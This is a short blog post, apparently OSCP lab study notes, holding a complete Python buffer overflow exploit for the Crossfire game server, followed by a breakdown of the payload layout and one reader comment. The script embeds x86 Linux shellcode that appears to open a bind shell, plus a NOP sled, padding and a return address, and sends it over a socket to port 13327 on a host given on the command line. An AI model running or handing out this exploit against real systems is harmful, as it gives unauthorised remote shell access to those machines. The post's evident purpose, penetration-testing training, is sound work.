OSCP: Linux shellcode
----------------------
#!/usr/bin/python
#exploit for crossfire
import socket, sys
host = sys.argv[1]
# 78 bytes
shellcode =("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80")
# 4379 bytes
#crash = '\x41' * 4368 + '\x42\x42\x42\x42' + '\x43' * 7
# 0807b8f8 - Indirect Jump
crash = '\x90' * 100 + shellcode + '\x41' * 4190 + '\xf8\xb8\x07\x08' + '\x43' * 7
buffer = '\x11(setup sound ' + crash + '\x90\x00#'
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
----------------------
crash = '\x90' * 100 + shellcode + '\x41' * 4190 + '\xf8\xb8\x07\x08' + '\x43' * 7
\x90 NOPs to the shellcode
\x41 a set of As to fill the space until the EIP address
\xf8\xb8\x07\x08 address to the %eax register where the shellcode is stored
\x43 a set of Cs to fill the 4379 bytes length of the BOF
posted by Matteo at
4:22 PM
1 Comments:
when i run host = sys.arg[1] -- it's giving error ,when i make it to the arr[0] -- it is going
By
Pentesting made easy, at June 24, 2013 at 7:49 AM
Post a Comment
<< Home